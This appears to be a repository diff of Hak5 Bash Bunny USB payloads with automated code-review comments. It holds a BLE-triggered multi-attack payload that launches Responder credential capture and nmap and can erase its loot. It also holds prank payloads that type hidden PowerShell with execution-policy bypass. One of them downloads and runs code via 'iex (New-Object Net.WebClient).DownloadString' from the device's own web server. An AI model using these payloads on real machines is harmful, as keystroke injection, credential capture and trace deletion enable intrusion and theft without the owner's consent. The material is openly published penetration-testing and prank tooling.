# ... and best of luck to you on that!
LED B SOLID
ATTACKMODE STORAGE
}
# For sharing, getting on via putty, or exiting USB mode
startEthernet()
{
CUCUMBER DISABLE
LED C SOLID
ATTACKMODE RNDIS_ETHERNET
}
# Delete everything in loot directory
# Depending on your engagement, could also delete switch and library - but be careful!
# Switches to HID to ensure it is not in USB mode or possibly timing out in Ethernet. Going plaid
# to delete those files
startSelfDestruct()
{
ATTACKMODE HID
CUCUMBER PLAID
LED R SOLID
rm -r /root/udisk/loot
rm -r /root/loot/
sync
shutdown now
}
# Main
# ----
# Start bluetooth for observation
source bunny_helpers.sh
stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
sleep 1
echo -n -e "AT+ROLE=2" > /dev/ttyS1
echo -n -e "AT+RESET" > /dev/ttyS1
# Wait for BLE
CUCUMBER ENABLE
LED W SLOW
while :
do
timeout 1s cat /dev/ttyS1 > /tmp/bt_observation
# Shutdown
if grep -ao $ABORT_MISSION /tmp/bt_observation; then
sync
LED FINISH
Q DELAY 1500
shutdown now
fi
# Responder - Windows
if grep -ao $START_QUICKCREDS_WIN /tmp/bt_observation; then
ATTACKMODE RNDIS_ETHERNET
startResponder
fi
# Responder - *nix or mac
if grep -ao $START_QUICKCREDS_NIX /tmp/bt_observation; then
ATTACKMODE ECM_ETHERNET
startResponder
fi
# Start nmap against host
if grep -ao $START_NMAP /tmp/bt_observation; then
startNmap
fi
# Open as USB device
if grep -ao $START_USB /tmp/bt_observation; then
startLoot
fi
# Open as Ethernet device
if grep -ao $START_ETHER /tmp/bt_observation; then
startEthernet
fi
# Limited self-destruct of loot
if grep -ao $START_DEL_LOOT /tmp/bt_observation; then
startSelfDestruct
# Leave the scene after the delete
break
fi
done
sync
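Review bot: `NMAP_OPTIONS = "-sS -O -sV -F -oA"` in the Options section has spaces around `=`, which bash parses as a command named `NMAP_OPTIONS` rather than an assignment, so the variable is empty when `startNmap` expands it; the other settings in this file use the `NAME="value"` form, which is what is needed here. Note that `-oA` expects a basename argument, so the option list should be re-checked once the assignment is fixed, given output is already redirected to `$NMAP_LOOTDIR/$HOST-$COUNT.log`. `if [ -z ""${TARGET_IP} ]` in `startNmap` should quote the expansion as `[ -z "${TARGET_IP}" ]`, the form `startResponder` already uses; as written an empty value leaves `test` with a lone `-z` and only happens to evaluate true.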


@ -0,0 +1,25 @@
## Revolver
This payload was made in the style of Q Branch: it provides multiple options for attack and getting out of bad situations. Switching into this payload will place the Bash Bunny in a command waiting mode. BLE beacons are sent to start attacks, including QuickCreds and nmap. A loot self-destruct option is also available. The payload is easily extendable to include any attack you might need in the field.
Note other payloads were co-opted into this multimode attack, and to make it easy
I used Hak5Darren's code, partially because I imagine he wants to see these payloads
extended, and also because I know he appreciates Q Branch.
**Features**
- Once active, the Bash Bunny blinks a white LED indicating it is waiting for BLE beacons
- Commands may be issued to start classic payloads (nmap, quickcreds), switch modes (USB storage or Ethernet), shutdown for removal, or initiate a loot self-destruct
- After attacks are complete, Bash Bunny returns to a waiting state for more commands (except for self destruct and shut down)
**Payload Configuration**
1. Change the BLE beacons in the *Options* section. Don't leave in defaults - you don't want someone else to control your Bash Bunny!
2. Verify the responder and nmap options are to your liking
**LED meanings**
- Slow 1 second white on and off: Awaiting commands
- Single yellow blink: Attack in progress
- Green rapid flash, then solid: Attack complete
- Solid red: Loot self-destruct - complete and ready to remove when off
- Solid blue: USB mode
- Solid cyan: Ethernet mode


@ -0,0 +1,20 @@
# Title: Excel QR Rickroll
# Description: Create a QR code in Excel that points to Rick Astley - Never Gonna Give You Up on YouTube
# Author: Cribbit
# Version: 1.0
# Category: Pranks
# Target: Windows (Powershell 5.1+)
# Attackmodes: HID & STORAGE
# Extensions: Run
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE
LED ATTACK
RUN WIN "powerShell -Noni -NoP -W h -EP Bypass .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\QRcode.ps1')"
LED FINNISH
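Review bot: `LED FINNISH` on the last line is misspelled; the pattern used by every other payload in this commit and documented in this payload's own README table is `LED FINISH`, so the finish indication described there is unlikely to be shown. The same typo is on the last line of the Replace Cursor payload. The README for this payload lists `Attackmode: HID` while the payload sets `ATTACKMODE HID STORAGE` and loads `QRcode.ps1` from the storage volume; the README should say HID & STORAGE as the Replace Cursor README does.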


@ -0,0 +1,22 @@
# Excel QR Rickroll
* Author: Cribbit
* Version: 1.0
* Target: Windows (Powershell 5.1+) + Excel
* Category: pranks
* Attackmode: HID
* Extensions: Run
## Change Log
| Version | Changes |
| ------- | ------------------------------|
| 1.0 | Initial release |
## Description
Create a QR code in Excel that points to Rick Astley - Never Gonna Give You Up on YouTube
## Colors
| Status | Color | Description |
| --------- | ------------------------------| ------------------------------------------------ |
| SETUP | Magenta solid | Setting attack mode, getting the switch position |
| ATTACK | Yellow single blink | Injecting Powershell script |
| FINISH | Green blink followed by SOLID | Script is finished |


@ -0,0 +1,20 @@
# Title: Replace Cursor
# Description: Replaces the standard arrow with a little bash bunny.
# Author: Cribbit
# Version: 1.0
# Category: Pranks
# Target: Windows (Powershell 5.1+)
# Attackmodes: HID & STORAGE
# Extensions: Run
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE
LED ATTACK
RUN WIN "powershell -Noni -NoP -W h -EP Bypass .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\ps.ps1')"
LED FINNISH


@ -0,0 +1,15 @@
# Copies the bunny ani file to the users profile.
$p=(gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\switch1\b.ani'
$f= $Env:USERPROFILE+'\b.ani'
if (Test-Path $p)
{
cp $p $f
}
else
{
cp ($p -replace "1", "2") $f
}
# Set the registory value of Arrow to the new cursor
sp 'HKCU:Control Panel\Cursors' Arrow '%USERPROFILE%\b.ani';
# Tell the system to update the displayed cursor
(Add-Type -Name c -Pass -M '[DllImport("user32.dll")] public static extern bool SystemParametersInfo(int A,int b,int c,int d);')::SystemParametersInfo(87,0,0,3)
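Review bot: `$p -replace "1", "2"` in the fallback branch rewrites every `1` in the path, not only the one in `switch1`, so a volume name or path component containing a `1` would be altered as well; use `cp ($p -replace 'switch1', 'switch2') $f`. The switch directory is guessed here although the calling payload line already resolves `$SWITCH_POSITION` to locate `ps.ps1`, so passing the switch in (or the resolved path) would remove the guess entirely. The comment `# Set the registory value of Arrow` has a typo (`registry`).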


@ -0,0 +1,47 @@
# Replace Cursor
- Author: Cribbit
- Version: 1.0
- Target: Windows 10 (Powershell 5.1+)
- Category: Pranks
- Attackmode: HID & Storage
- Extensions: Run
- Props: The Hak5 Team (Wallpaper changer & Eject USB sound)
## Change Log
| Version | Changes |
| ------- | --------------- |
| 1.0 | Initial release |
## Description
Replaces the standard arrow with a little bash bunny icon.
## Notes
I have included a both a static and animated cursor.
## Information about SystemParametersInfo
### Microsoft Doc:
https://docs.microsoft.com/en-gb/windows/win32/api/winuser/nf-winuser-systemparametersinfoa
### Flags
```
SPI_SETCURSORS = 0x0057;
```
Convert uint to int = 87;
```
SPIF_UPDATEINIFILE = 0x01;
SPIF_SENDCHANGE = 0x02;
```
Bitwise "OR" these two together (0x01 -bor 0x02) = 3;
## Colours
| Status | Colour | Description |
| ------ | ----------------------------- | --------------------------- |
| SETUP | Magenta solid | Setting attack mode |
| ATTACK | Yellow single blink | Injecting Powershell script |
| FINISH | Green blink followed by SOLID | Script is finished |


@ -0,0 +1,39 @@
#!/bin/bash
# Title: Spinning Around
# Description: Spinning Ascii Hak5 Logo
# Author: Cribbit
# Version: 1.0
# Category: Pranks
# Target: Windows (Powershell 5.1+)
# Attackmodes: RNDIS_ETHERNET HID
# Props: TW-D - inspiration, audibleblink - python server
# Super mad Prop: Lee Holmes - Powershell Rickroll iex (New-Object Net.WebClient).DownloadString(“http://bit.ly/e0Mw9w")
LED SETUP
ATTACKMODE RNDIS_ETHERNET HID
GET SWITCH_POSITION
GET HOST_IP
cd /root/udisk/payloads/$SWITCH_POSITION/
# starting server
LED SPECIAL
# disallow outgoing dns requests so server starts immediately
iptables -A OUTPUT -p udp --dport 53 -j DROP
python -m SimpleHTTPServer 80 &
# wait until port is listening
while ! nc -z localhost 80; do sleep 0.2; done
# attack commences
LED ATTACK
QUACK DELAY 200
RUN WIN Powershell
QUACK DELAY 500
QUACK STRING "iex (New-Object Net.WebClient).DownloadString(\"http://$HOST_IP/spin\")"
QUACK ENTER
LED FINISH
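Review bot: `python -m SimpleHTTPServer 80 &` is started after `cd /root/udisk/payloads/$SWITCH_POSITION/`, so it serves the entire switch directory (payload.txt and anything else stored there) rather than only `spin`, and nothing stops the server or removes the `iptables -A OUTPUT -p udp --dport 53 -j DROP` rule once the injection is done, so both appear to persist for the session. Serving from a subdirectory that holds only `spin`, and adding a header comment such as `# Note: the HTTP server and the DNS DROP rule stay active after FINISH` would make the footprint explicit. The README lists `Extensions: Run`, matching the `RUN WIN Powershell` line, but the payload header omits it; add `# Extensions: Run` as the other payloads in this commit do.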


@ -0,0 +1,28 @@
# Spinning Around
- Author: Cribbit
- Version: 1.0
- Target: Windows (Powershell 5.1+)
- Category: Pranks
- Attackmode: HID & RNDIS_ETHERNET
- Extensions: Run
## Change Log
| Version | Changes |
| ------- | --------------- |
| 1.0 | Initial release |
## Description
Spinning Ascii Hak5 Logo in a powershell window\
![Demo](demo.gif)
## Props
To TW-D for the inspiration, audibleblink for python server code "execution/ShellExec/payload.txt" and
Super mad props to Lee Holmes for Powershell Rickroll for the animation code.
https://www.leeholmes.com/powershell-and-html5/
## Colours
| Status | Colour | Description |
| -------- | ----------------------------- | --------------------------- |
| SETUP | Magenta solid | Setting attack mode |
| ATTACK | Yellow single blink | Injecting Powershell script |
| FINISHED | Green blink followed by SOLID | Injection finished |


@ -0,0 +1,71 @@

$frames = @(
" # # # # # ;;iii; ,::::, ..,. # # :MX,:,M 0ii;2r MMMMMMMMMMMMMMMMMr # # SX.,.iW B7 ,i; 0MM@BWWWMMMMMMMMMM # # a.., 0Z r...: .... . ..MMM8a8880r,:iiiii, # # X.,, ZX .:, 2Z .;. XM722r, .MM7Si,MMMr :ZZZZZZ0, # # r.,,...,:;;::,..i. iM2 ..:r rMM iMMZ X0ZZZ8Z0MMMMMMM0 # # ,,,, ;a7;,.,.,,: ,Mr .S .r ;MB :8 ,8MB88808Z000BBBBWMX # # i,,.8;77,i.;2.,,:iMX 8M. ; XMZ SMM0000ZZMMM0Z8880M: # # 2S.,.M: X7 ,.;Ma SMMr ,.WMr .MB , MMMMaZZZZB0 # # ,2 ,. M Zr.,.0W .;i. ...MM iMMB 7SZaX:SMMMZZZZZ8@i # # r;.,.:Z @Z..i0. ;i: ;Z,. MM , @M2ZM@MMMWMMM02ZZZZWS # # r;:;.2: S,:,iZ ;r ,MX,,82.;X 2MMB000088MM@aaZZZBa # # .:i;:. ... .. MMMMMMZZ888ZBMMZaZZ8W2 # # .ZaS8MB0008ZZ8ZZ80BWr # # .XZ88BB88000Zr # # # # # # # "
" # # # # # 7MMMMSXX2r X2ZWai7X7. # # ,MMMM87i;7: SMMMM8:;2Z. BMMMMM@@WWB0BBZ2 # # ZMMM2 :ii7 MMMMM::i7 rMMMMMMMMMMMMMMMM # # WMMMr ii;a SMMMM:.ii: .. . :MMMMMW80BB77XX;7: # # MMMMi.iiiX, MMMM@;,,8MMMMS820MMMM22MMM; S08800 # # MMMM:,iii;7, .:i,SMMMa,i:2MMM0 :M@. Z0888BMMMMM7 # # WMMM ,iiiir7. ,:i,iMMX iS..MMM2 .S ZMB8888WBBWWM@ # # aMMM,:iiSrXMM@88X:i.7MZ WM aMM7 . :MM808B@M@800M2 # # ;MMMM7,i7r MMMMM,:i 0M XMM: iMM: WM. ZMMMMMBZ80M, # # MMMM;.iiri MMMMB ::,Mr .::,.. MM. MMZ 2ZM@BWMWZ88W8 # # ,MMM8 ,iir, .MMMMW7,,28.:S8SX;, 0@ MMMZ@W8ZaWM0Z80M. # # iMMMZ :ii; XMMMMS:i:2X:SWMMMM:iZa,7MMMM888Z0MWZ88@X # # iMMMa,7XXi .iSB::i,7;, MMMMMM8WB8808BW880@S # # ,. ,,. :ZMWBMMW@WWBBW@Br # # ,iiXXXi: # # # # # # # "
" # # # ,,,;rrX;:. # # SMMMMMMMMMMZ8@MMMM@Sa2 # # MMMMMMMMMB2X7WMMMMMXZ0 i@BBBBBM0ZaSX: # # MMMMMM@MMSi7rWMMMMMXXX MMMMMMMMMMMMMM # # .MM@@@@W@MX;r7MMMMMZiX; 7MMMMMMMWWB7XZi # # ;MM@@@@@MM7r7;BWW@M8;2MMM0ZMMWXWMXSBW8 # # iMM@@@@@MM;r7;i,:i;rrXMMWr;BM0 BZ aBBWMMM # # iMM@@@@@M@;r7;iri,irr;MMiXi2MB,Xi8@0B@@MM # # MM@@@@@M@ir7SZMM8ZX;rM2:MrrM0:ii@MBWMW@M # # iMM@@@@@MMX;XMMMMMM;;SMi2MXiMZ7M:XMMM@0M8 # # MM@@@@@@M0rrr@MMMM0iiZ8:7X;:MaXMS2WB@W0Mr # # ;MM@@@@@@Mr;r;MM@@MBr;BX;a27,0XXMM088@BBM # # 2MM@@@@@M@;rrrMMMMM8r787@MMMiZX8MM00BM0MX # # BMMMMMMMMW;rrS@MMMMS7XSiMMMMMMMMBB0BBW@@ # # rZ88W@MMMM7aa S@@MMMMMMM@W8 # # # # # # # # # "
" # # # 2a222222aBBB0; # # rMMMMMMMMMMMMMMMM: # # 7MMMMMMMMMMMMMBMM@80BX # # XMM@@@@@@@WWMBZMWMMMMMa # # 8M@WWWWWWWWWM0ZM0WMMMM, # # ZM@@@@@@@@W@M0ZM0BBWMX # # ZM@@@@@@@@@@MB2aZ008WM: # # ZM@@@@@@@@@@M82aa008@Mi # # ZM@@@@@@@@@@M8Z@8008WMi # # XM@WWW@@@@@@MBBM80B0WM # # WMWWBBBBBBBWW80MZZZWMM # # MMWWWWWWWWWW@Z0MZ8ZBMM # # MMWWWWWWWWW@@a0MaWW0MW # # MM@@@@@WWW@@@aWM0MMMMB # # MMMMMMMMMMMMMBWMMMMMM, # # i,...irrrrrrX. # # # # # # # "
" # # # r8B0222222222; # # XMMMMMMMMMMMMMMMMM, # # 7ZB0008MMMMW@MMMMMMMMMMMMX # # ,MMMMMMMMWMM00@@@@@W@@@@MMX # # ZMM@@@@B8WW88@WWWWWWWWW@M0 # # 2MBWBBB0WW88@@WWWWWWW@@MW # # MM@0BB0W88888@@@@@@@@@@@MW # # @MM8BW0W88088@@@@@@@@@@@MW # # WMM80B0B0WM08@@@@@@@@@@@Ma # # WMB0BBWB8@MW8@@@@@@@@WW@MX # # 2M@@W0808W@WZWWBBBBBBBBWMM # # XMMMB8BB0W@WZBWWWWWWWWWWMM, # # .MM@BBMB8WMWZB@WWWWWWWW@MMi # # MMMMMMMB@MM8BM@@@@@@@@@MM2 # # ;MM@MMMMW00@MMMMMMMMMMMMMZ # # ;r;;ri..... . # # # # # # # "
" # # # ...;7;., # # i08ZMMMWWWWBBMMMMMMMMM7 # # ,X2Z88WMMWBBBWi :M0aMMMMMMZXS8MMMMMMMMM # # 2MMMMMMMMMMMMMB aSSMMMMMMZ7XraMMMMMMMM # # 82XX@MWMMMMMMM; rXraMM@MMB7XrSMM@@@@MMr # # 0WB8r0MBaMMMB@MMMMS;ZM@@WMB7X77@M@@@@MMX # # 7MMMWBB0i:@8,WMM22aMMM7r7r;ri;7XXXr@M@@@@MM7 # # BMMWWBBW@7r2;WMW;a7XM@r77ri;XXrXXXrWM@@@@MMX # # 7MWWMWBWMZir;0MZiWZ:BM77X00@MMaSXXrBM@@@@MM # # MWBMMMMBiXM;aMS;MM;XMS77WMMMMM@77XMM@@WWMM7 # # @MB@@BWWSBM;2M7rXS7;B877aMMMMMBr77ZM@@W@MMM: # # rMWW@0B@WMM77@rXaZar2WX70MM@@MWr7rrWM@@@MMMZ # # MMBMWBWWMM8S0XZMMM8SBSXaMMMMMM7X7rBM@@@@MMW # # ,MMWWBBBWWMMMMMMM; r2XX7@M@WW02SXr0MMMMMMMM # # iWMMMMMMMMMMWZ iZZX0M@W82SXS # # , # # # # # # # "
" # # # # # :XrX708Xi r2XXZMMB: # # X0BBWWMMMMMMMMMMZ rB27;MMMMi ;S7rXWMMM # # 7MMMMMMMMMMMMMMMM; ,X;i7MMMM ,S;;::ZMM2 # # ;7i;SXrBWB00MMMMMi . ,. i:i.7MMMX Z;i:.7MMM # # ZB88Z8; ZMMMZaMMMMMXBaMMMMM;:.7@MMM :X;ii,iMM@ # # 0MMMMMB88880X rMMi,8MMMW,;;;MMMM:::,..:rr;7;;;i:,MM@ # # .MMWWBBW8Z880@MX :Z:.XMMM;.rX .@M@.:::, :7Z7ii;i: @M@ # # @@008@MM080Z0MW.. :.;MMW..2M: .MMi,iiaBBM8rSra;i:,MM0 # # XM0880MMMMMr :.,MB .MM2 ,BMM. rMX,i:7MMMB aXi:rMMMX # # MB08ZWM@WM@SZS.BMM BMi,:::;.. 0B,ii,MMMM :Xii.;MMM # # rMB8Z8MM8ZBMMM8MMM aM.:;XSZ0r,i@X::SMMMM. ,X;i, 0MMi # # ZM08ZBM@800BBMMMMX.7Bri0MMMB;X:0Xii:aMMMS r;i: aMM7 # # 8M08ZW@88008B0BMMMMM, .,;;:: iai. iS2X:SMM: # # S@MWBBBBWWWMMW@Br. # # :;XXaZXri, # # # # # # # "
" # # # # # .,,,.....,,,,. ::,::, ,r.::i: # # ;MMMMMMMMMMMMMMMMM, X27ii7 MM.::2M. # # 0MMMMMMMMMMWWWWMMM. ;7..;; 2M. .,2X # # :.;;ii: 2B88ZZWMM ,, ... .X ,,r .MZ . :Z # # 7BZZZZ80X.7MM7 :X7MB 7X8X2 iX..2X.,. MZ ..,X # # 8MMMMMMMWZZZZZZB2. 8MMi. MM :r,:.X8 ,7.,:;i;;, ..,,,i # # :M@BBBB0008Z0880B@M8, ,@7 8M r: X7 rS ;r.,,::,;XZ; .,,. # # MB8888ZWMMX7B0BBBMMS .. XM ;..B;. rr,X.,,Xi ,i27B0..:7 # # 2@8ZZZZ8MMW : 0Mi ,M. i.:M88, X7;.,,i, MM .,2X # # @B88ZZaWMMX ;SaaSX: 8M,; M0.,,.:rX:. X0i..;X MM .,.a. # # ;M088ZaaMMMMMMMMMMBXM ,. BM,.:7:,:i7,.0S..S0 ;M. ..X; # # XM08ZZa8MMM88080BWMM 7;.;@;;;2 :7.aS:i:r. @B,7iri # # 7MB8ZZa0MMBZZ888ZMMMMM. . . ,.:.,. # # ,W@B8ZaZ08Z88080M@8Ba # # ;ZBBBBBBWWB80X # # # # # # # "
" # # # # # .2ZZZ0B0ZZaaZZaSSXX . # # :MMMMMMMMMMMMMMMMMM: SMMMMr7rrSMMMM2:r0. # # rM@M@@@@@MMW0000B@M7 2MMMM..:,aMMMMZ ,8X # # BMZZZ80@M: . MMMM. ,,.MMMMM .:S # # .,, iMBZZZ80@M8i;;rMMMr7iSMMMX;;iMMMM. ;;MMMMM ,,X # # ;MMMMMMMW80BZZZ80B@W; ;MMM ,iMMMM SMMM . ,,X. # # MMBBB0008ZZBBZ8880BWM@; XZ .rMMM2 X aMM .., ;X. ,:: # # 0@08888ZZ0 MMWBBWB8WMM . MMM. ,M8 MM .;rMMMMM.,7 # # :@8ZZZZZZW :MMW :Ma WM@ 7MM: Mr ,,iMMMMM .7X # # ZW88Z888B0 ,::,.WMMr. :MMM ZMX . SW..X:MMMMM .:X # # BW888880MS BMMMMB88BM7XMMM ;M: :i0MMW, 0:,; ;MMMMX,iX # # B@88880BM, MMZZZZ8B@2 r8M;.,B7ii .7Z@X.X:, i;,:: # # Z@08880WW 2MBaZ8800BMX: # # r@B8880BWMMBZ88880WMMM # # 8@WBBB088800WWW@r # # .SZB08880ZZ7;, # # # # # "
" # # # .... # # 7MMMMMMMMMMMMMMMMMMWWWr # # .MMMMMMMMMMM@@@MMMMMMMa WMMMMMWX72ZWBr;: # # .MMMMMM@@MMM@WWBBBBB@MZ MMMMMM@i;MMMM27Z # # MMMMMM880B@Mi WMMMMMM.,WMMMZ,2 # # :;;;: 8MBWMMW800BMM8r2MMM02MMMW:iZMMS 2MMMZ,S. # # rMMMMMMM@8ZZZZ8B880BWMW;.7MMX.BMM2 .MMX , .iX # # MMMMMMB008888ZZZ88800B@M2 .8;.2MMr 7 7M7 ::rZ;ir # # MMMMMWZ8888888@MM@88880MMi. : XMM,.M2 M0.iMMMMrr, # # SMMMMMa888888BX .2M@WW@MX ,aW iM@ iMB r@,,@MMM;;X # # MMMMM8Z88888BS BMMMMMB:.rMM..MZ., :, 0r,MMMMXir # # ;MMMMMZ888880WMMM@000B0@SMMM, M2.ZMMM7SX:78WMZ;X # # ZMMMMWZ88800BBMMMZaZ8BWZ8BMS,22::i:X:. # # 0MMMMWZ88008ZBMMWZ800B2:. # # ZMMMMWZ8888ZZWMM88800@MMi # # :MMMMM88088ZZ0080BWM2 # # i8@MMM@@WWWWW@W8S; # # ,;X2XXXi. # # # "
" # # # ::,:rrrrXZ2SSSri. # # XMMMMMMMMMMMMMMMMMMMMX # # MMMMMMMMMMMM@MMMMMMMZ WW000MMMSrSr # # ;W8ZZW@MMMM@@@@@@W@MM MMMMMMMMZMMMX # # MMMMMMMMMMB@Ma MMMMMMMMXWM@X # # ir;i.WM@@@WWWWMWWMMSaM8ZMZaM2ZMWr # # MMMMMMMWWWW0000BBB@MZ:Wa;MS:MZ;72r # # aMMMMMM@@@@B0BBBBBBWWMS7XSMS;0Z;Z0; # # ZMM@@@@@@@@0BBBB@MWBBM@;;2MXBaZSMMX # # :MM@@@@@@@@0BBBBWM@WWM27ZXM7BSZSMMS # # MMM@@@@@MMW0BBBBWW@MMX2MXW7XS2aMMa # # 8MM@@@@@@M@0BBBB@@WW@B@MSBaMMXX7Si # # MMM@@@@@MMBBBB0WMB0WBZ@XX: # # ZMMMM@@MMM@0BB0BMW0WB: # # MMMMMMMMMMB0BB0MMBB@MZ # # MMMMMMMMMM0BBBBWB@M # # MMMMMMMMMMWWWWMMW: # # ;rSaZWWMMMMM@Zi # # # "
" # # # ZZ222228BBBBWZ # # ,MMMMMMMMMMMMMM # # MMMMMMMMMMMMMMi # # 2BMMMMMMMMMMMMS # # MM@@@@@@@@MMX # # 2MM@W@@@@W@MMX # # aMMWBBBBBBBBWMX # # 2MWBBBBBBBBBBMX # # SMM@@@@@@@@@MMX # # SMM@@@@@@@@@MM7 # # SMM@@@@@@@@@MM7 # # SMM@@@@@@@@@MM7 # # :MM@@@@@@@@@MM. # # .MM@@@@@@@@@MM. # # MM@@@@@@@@@MM. # # MMMMMMMMMMMMM. # # 8MMMMMMMMMMMM # # iMMMMMMMMMMMM # # # "
" # # # .;Xa22aaa2rrrrr;, # # BMMMMMMMMMMMMMMMMMMM2 # # .7r2@M@0000BXWMMMMMMMMMMMMMMMMMMM # # ZMMMMMMMMMMMMMM@MMMMM@MMMM@0ZZZBS # # 2MM8MMMMMMMMMWW@MM@@@@@@M0 # # 7MMZMBB@8@BZ@WW@WWWW@WWWM0,irr # # 7BZa@aZW2W2Z@WWWWBBWWWWW@MMMMMM; # # rM8aWa8@aZZ@WWWWWWWWWWW@MMMMMMMM # # aMMZ0B8@a2BMWWMMWWWW@@@@@@@@MMMM # # 8M@ZZB8W88a@WWM@WWWWW@@@@@@@@@MZ # # 0MM00ZZWB@2WWWBWWWWWW@@@@@@@@@M; # # ,XS8MMW@WMW@W@@WWWWW@@@@@@@@@MM # # ,S00B@WW@WWWWWM@MM@@@@@MZ # # :0MW@@WWWW@M@@@@@@@MM # # MM@W@@WWWWM@@@@MMM@MX # # WM@@WWWWMMMMMMMMMM@ # # WMMM@@MMMMMMMMMM@ # # ;BMMMMMMMWW8aar # # . # "
" # # # ..... # # XM@MMMMMMMMMMMMMMMMMMMS # # ;rZB22SS@MMMMWWX ZMMMMMMMMMMMMMMMMMMMMM, # # MaMMMMZXMMMMMMMS ZM@WWWWWW@WWMMM@MM@@@MX # # :87MMMMXi@MMMMMM ,M@B00BMMMMMM; # # ,ar@MM@iXMMZ7XMMMBZMMMW20M@B000WM@WWWMr:iiii. # # .2;:,:r;XMMi..@MMSrMM077BMB0000B8ZZ880MMMMMMMM2 # # S7SZrri7M2:S,8MMXiZXi2M@B00008888800BWBMMMMMMM. # # rS8MMM2:SM:ZM,XMM;iii;MM00000BMMW0000000BM@MMMM # # 2X8MMM7:8a:BMi;MM:2@ri7M@@W@@Mi ZB0000080M@@MMM # # S7WMMMS;0rrri;iMW,8M0:i8MMMMMMr 8W00000ZWM@@@Mi # # X70WZ8XS82MMMaiWBi0MM2BBBBBB@MMMB0000000MM@@MB # # ,;.:,;aSrWM0ZW08888MMMW0000000MMMMMM # # i,XW0008WMMB8000000MMM@MM # # MMMWB000MMW8000008MMMMMM # # iMMWB0000000000MMMMM0 # # ,20MM@@W@@@MMMMMW2 # # :rSZ882Xr. # # # "
" # # # # # .. . Xa2ZZZZZZBWBBBBB0Z2 # # 2SrSMMMWWX7S2MMMMB BMMMMMMMMMMMMMMMMMM. # # .MX:XMMMMM;:i;MMMMM ,MMWBBBB0@MMMMMMMMMM: # # iS:,8MMMM@.i rMMMM; .. WMB000ZWMZ # # ;X:.8MMMMMi,iMMMMiXrWMMM07rWMMM7XraMM088888MM, .,., # # :ri. ,i,,MMM; :.SMMMM,:XMMZ:.i8@008888008BMMMMMMMM: # # ri,.Xr ::: WM7 iX MMMW..iZ. ;0MW0880088BBBBBBBBWWBMM # # rr,8MMMM@;:,,M8 MM aMMZ . .8MM8Z0WWWMMB ZB0000008M@ # # .Zi.8MMMMM.:.XM XMM. ,MMX :Ma . 2MMM BB888888aM: # # iX: 8MMMMW7,:B7 .. .. WMi XMMS .:0MM0 ,. 7M088888Z@B # # ;XriMMMM@;ri;8,7MMMWr: ZM: SMMMX8W800@MMMMX MB88888ZBM # # . . :,,7,20X;,.r:2Zi:0MZr,WB8Z800WMM B@08888ZWM # # ;ZWB088888MMX;M088880MB # # ZMMMB008080MM@W00880WW7 # # WM@WW08800000BWWS # # :iXZB00WWWWB8r # # # # # "
" # # # # # .,.,.i :,..,. :,iiiiiiiiii;:,.. # # MS:irMMX i7i;7BM MMMMMMMMMMMMMMMMMB # # rZ,. rMM, .7,, MM SM@BBBBW@MMMMMMMMM # # S:.. BMM :i, MX .. ...aM0ZZ880r ., # # X,,, BM@ ..,Z,..MB :XZXXZ ;S;r ,Za::0BZZZZZ0. . # # i::. ,;i:i,. MB .S,,.,M ,i,i.X8r ;08ZZZZ80WMMMMMMMB. # # .::. ;27:::.,. WM i.,Z ZX ;i.iZX :MM0888800BB0000BBBM2 # # r:,:WMMr:.,X:,. MW . BS. iB ;:.:. :XM@0000B2 0MBZZ8888Mr # # XS,,,MMB ;., ,M7 ZMXr B. ;.:S;:. .. MMZZZZZZ8W # # S.,. MMS ,a,. Z0 i:;,. XS ; 7, Si ;7;77X; WMW2ZZZZZWr # # ,7., :MM ;0,.,B. X7, ,ri,.@2i.; XaM@MMMMM,rMM2ZZZZZBZ # # ,7i7.0Bi iii::Z,;8 rii@Z:;X.: ZMB0000BS MMZaZZZZB8 # # MMWM@8ZZZZ0ZMM02ZZZZBZ # # Z@S,@088Z88WW8ZZZ8BB7 # # rBBBWWWB0BWWW0S # # .:,..,,: # # # # # "
)
$counter = 0
$maxCounter = $frames.Count
$host.UI.RawUI.BackgroundColor = "Black"
$host.UI.RawUI.ForegroundColor = "Red"
1..4 | % {
try
{
$host.UI.RawUI.WindowSize = New-Object System.Management.Automation.Host.Size 72,30
}
catch {}
}
try
{
Clear-Host
$host.UI.RawUI.CursorPosition = New-Object System.Management.Automation.Host.Coordinates `
0,([Console]::WindowHeight - 1)
Write-Host -NoNewLine 'Press Q to Quit'
## Loop through the frames and display them
[Console]::TreatControlCAsInput = $true
while($true)
{
if([Console]::KeyAvailable)
{
$key = [Console]::ReadKey()
if(($key.Key -eq 'Escape') -or
($key.Key -eq 'Q') -or
($key.Key -eq 'C'))
{
break
}
}
$host.UI.RawUI.CursorPosition = New-Object System.Management.Automation.Host.Coordinates 0,0
Write-Host (($frames[$counter] -split "`t") -join "`r`n")
Start-Sleep -m 150
$counter = ($counter + 1) % $maxCounter
}
}
finally
{
## Clean up, display exit screen
Clear-Host
$frames[0] -split "`t"
"`n"
" Trust Your Technolust"
"`n`n`n"
}
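Review bot: The `finally` block clears the screen and prints the exit art but never resets `[Console]::TreatControlCAsInput`, which the line just before `while($true)` set to `$true`, so once the animation ends the target's PowerShell session keeps treating Ctrl+C as an ordinary keystroke rather than an interrupt; add `[Console]::TreatControlCAsInput = $false` as the first statement of `finally`. The same block also leaves the console in the black/red colours set at the top; if a clean exit is intended, capture `$host.UI.RawUI.ForegroundColor` and `BackgroundColor` before changing them and restore both there. `[Console]::ReadKey()` echoes the pressed key into the frame area; `[Console]::ReadKey($true)` intercepts it instead. The four-pass `try { WindowSize } catch {}` loop looks like a deliberate best-effort against resize failures and is fine as written.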